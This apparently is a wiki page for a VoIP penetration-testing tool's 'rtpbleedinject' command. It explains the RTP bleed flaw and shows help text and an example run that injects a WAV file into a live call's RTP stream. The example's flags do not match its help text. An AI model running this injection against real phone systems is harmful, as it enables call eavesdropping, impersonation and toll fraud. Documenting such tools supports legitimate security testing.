Skip to content

Command rtpbleedinject

Jose Luis Verdeguer edited this page May 16, 2024 · 1 revision

The RTP bleed Bug is a serious vulnerability in a number of RTP proxies. This weakness allows malicious users to inject and receive RTP streams of ongoing calls without needing to be positioned as man-in-the-middle. This may lead to eavesdropping of audio calls, impersonation and possibly cause toll fraud by redirecting ongoing calls.

More info about the vulnerability: https://www.rtpbleed.com/

Usage

$ sippts rtpbleedinject -h

Target:
  -i IP       Target IP address
  -f FILE     Audio file (WAV) to inject

Other options:
  -r PORT     Port number to flood
  -p PAYLOAD  Codec payload (default: 0)
  -h, --help  Show this help

Example

$ sippts rtpbleedinject -i 192.168.1.1 -p 10070 -f audio.wav

[✓] Target IP: 192.168.1.1
[✓] Target port: 10070
[✓] Payload type: 0
[✓] WAV file audio.wav

[+] Reading WAV file ...
[+] Sending RTP packets to 192.168.1.1:10070 to obtain info about the streams
[-] Received 172 bytes from target port 10070 with seq number 1457
[-] Current Seq: 1457
[-] Current Timestamp: e11cb785
[-] SSRC: 0ba5415a
[-] Version: 8000
[+] Injecting RTP audio ...
[+] Sending packet 218416 of 477344 (version: 8000, seq: 1704, timestamp: e11e63a5, ssrc: 0ba5415a)
Clone this wiki locally